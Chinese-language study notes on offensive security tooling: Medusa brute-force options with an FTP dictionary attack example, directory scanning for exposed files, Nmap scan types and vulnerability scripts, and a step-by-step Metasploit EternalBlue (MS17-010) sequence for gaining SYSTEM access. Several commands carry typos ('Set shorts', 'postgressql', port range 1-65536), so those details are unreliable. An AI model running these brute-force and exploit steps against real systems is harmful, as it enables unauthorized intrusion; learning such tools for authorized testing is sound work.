9.26 扫描工具
美杜莎medusa 开源的,支持的服务有很多种,ftp,ssh,mssql,mysql,snmp等等
kali系统中内置有。
Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
例如Medusa -h 123.123.12.1 -P /root/top1000.txt -M ftp -e ns -t 20 -f -r 0 -O ./result_ftp.txt
-h 爆破的主机ip
-H ip集合
-u 用户名
-U 用户字典
-p 单个密码
-P 密码字典
-C 组合条目文件username:password
-M 模块
-O 输出list
-e ns e表示制定策略爆破,n表示空密码 s表示密码用户名相同
-n 端口
-t 线程数
-f 找到正确账户密码终止
-r 重试间隔时间
-d 显示所有模块的名称
目录扫描:扫描站点的目录,寻找敏感文件(目录名、探针文件、后台、robots.txt、备份文件等)
目录:站点结构,权限控制不严格
探针文件:服务器配置信息,phpinfo.php redme.txt config.txt
后台:管理整个网站的入口,inurl:admin.php
robots.txt:一般存放在站点根目录,如果管理员对robots.txt文件不合理管理就会造成信息泄露
备份文件:数据库备份、网站备份文件(xxxx.bak、xxxx.zip、xxxx.rar之类的格式)
御剑后台扫描工具
DirBuster
Nmap最早是linux中的扫描和嗅探工具,网络连接扫描工具,主要探测主机存活(是否开机)、开启服务(扫端口)、安全性问题(高级用法)、系统类型(OS类型)
Nmap的安装、配置环境变量
用法:(明令行模式)
nmap -h 帮助信息
nmap 123.123.12.1 扫描单个ip
状态:
Open 开启
Close 关闭
filtered 被过滤、探测包被拦截,无法定位端口是否开启
Unfiltered 未来=过滤,探测包没有被拦截,只是nmap无法判断该端口是否开启
open|filtered 开启或者被过滤的
close|filtered 关闭或者被过滤的
nmap 123.123.12.1/24扫描整个网段
nmap 123.123.12.1-200扫描指定的网络
nmap 123.123.12.1,100,200-230扫描.1 、.100、.200-230之间的网络
nmap 123.123.12.0/24 10.10.10.0/24 扫描不同网段
nmap -iL filename 扫描目标文件
nmap -iR 随机选择目标去探测 eg:nmap -sS -PS80 iR 0(无休止的去扫描)-p80
nmap 123.123.12.0/24 --exclude 123.123.12.10,255,20-30 排除某些IP去扫描
带有参数的扫描
nmap -sT 192.168.1.1 使用TCP全连接的方式,扫描过程需要三次握手去建立连接,建立成功,则端口开放。扫描速度慢
nmap -sS 192.168.1.1 使用SYN的数据包去检测,需要接受ACK,则说明端口开放了
nmap -sN 192.168.1.1 NULL扫描,发出的数据包不设置任何标识位
注意:上述扫描的端口默认都是1-1000
-p后跟指定的端口 -p20,21,22,3306 -p- = -p1-65536
nmap -sV 192.68.1.1探测服务版本
nmap 192.168.1.1 >./re.txt
nmap 192.168.1.1 -oX re.html
nmap -A 192.168.1.1获取目标所有详细结果,全面扫描
nmap -O 192.168.1.1探测操作系统的类型
--script 使用脚本去探测漏洞
nmap --script smb-vuln-ms17-010 192.168.1.1 永恒之蓝
nmap --script smb-check-vulns 192.168.1.1 MS08-067
nmap --script ssl-heartbleed 192.168.1.1 心脏滴血
使用MSF通过MS17-010获取系统权限
Step1:开启postgressql数据库 /etc/init.d/postgressql start
Step2: msfconsole进入MSF中
search 17-010 搜索cve17-010相关的exp
auxiliary/scanner/smb/smb_ms17_010扫描漏洞是否存在
exploit/windows/smb/ms17_010_enternalblue用来攻击的exp
Step3:
探测漏洞是否存在
use auxiliary/scanner/smb/smb_ms17-010
Set rhosts 10.10.10.0/24
Exploit
Step4:实施攻击
use exploit/windows/smb/ms17_010_eternalblue
Set shorts 10.10.10.12
Exploit
Step5:攻击成功之后就能到目标的system权限